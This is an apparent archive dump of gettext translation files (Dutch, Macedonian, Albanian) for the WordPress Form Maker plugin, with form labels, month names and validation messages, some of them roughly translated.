10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:02+0400
PO-Revision-Date: 2015-05-22 17:02+0400
Last-Translator: 
Language-Team: 
Language: nl
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
aprilNetnummeraugustusCentsPlaatsLanddecemberDollarsFOUT: e-mail is niet verzonden.Fout, het bestand kan niet worden verplaatst.Fout, onjuiste beveiligingscode.februariVoornaamFragaan januarijulijuniAchternaammaartmeiMiddelhoogEr is niets verzonden.novemberoktoberTelefoonnummerPostcodeMængdeReset Kies een DatumSelecteer een veld septemberSorry, je hebt geen toestemming om dit type bestand te uploaden.Staat / Provincie / RegioAdresAdres regel 2DenHet bestand overschrijdt de toegestane grootte vanDit veld %s verwacht een unieke invoer en deze waarde is al gebruikt.Dit is geen geldig e-mailadres.TitelTilVerificatie link is ongeldig.Je kunt geen vroegere data te selecteren. Kies een datum vanaf het huidige.Uw e-mailadres is al geverifieerd.Uw e-mail is met succes geverifieerd.Uw e-verificatie is verlopen.Uw formulier is verzonden.Din IP er sortlistet. Kontakt venligst hjemmesiden administratorDin score skal være mindre endveld is verplicht.værdi skal være mellemlanguages/form_maker-mk_MK.po000060400000060611152434416630012200 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:00+0400\n"
"PO-Revision-Date: 2015-05-22 17:01+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: mk\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Улица и број,"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Улица и број Линија 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Град"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Држава / Покраина / Регион"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Поштенски / Поштенски код"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Земја"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "јануари"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "февруари"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "март"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "април"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Мај"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "јуни"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "јули"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "август"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "септември"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "октомври"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "ноември"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "декември"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Грешка, неправилна безбедносен код."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Вашата IP е во црната листа. Ве молиме контактирајте го веб-сајтот "
"администратор."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "На датотека ја надминува дозволената големина на"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Жал ми е, не ви е дозволено да испратите овој тип на датотека."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Грешка, датотеката не може да се премести."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Ова поле %s бара единствен влез и оваа вредност е веќе поднесено."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Грешка, е-мејл порака не беше испратена."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Ништо не е доставен."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Твојата форма беше успешно поднесени."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Грешка, е-мејл порака не беше испратена."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Вашиот е-мејл адреса е веќе потврден."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Вашиот е-мејл беше успешно потврдена."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Проверка на вашата е-маил истече."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Верификација врска е валиден."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "поле е задолжително."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Ова не е валидна емаил адреса."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Не можете да изберете поранешниот датуми. Изберете датум почнувајќи од "
"сегашната."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "На"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "вредност мора да биде помеѓу "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Кол"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Вашиот резултат треба да биде помал од "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Наслов"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "прв,"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Последна"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Средна"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Повикувачкиот број"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Телефонски број"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Долари"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Центи"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Од"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Да"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "одат "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Ресетирање "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Одберете поле "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Одберете датум"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-sq.po000060400000057064152434416630011635 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:04+0400\n"
"PO-Revision-Date: 2015-05-22 17:04+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: sq\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Adresa Rruga"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Line Rruga Adresa 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Qytet"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Shteti / Provinca / Rajoni"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postal / Zip Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Vend"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
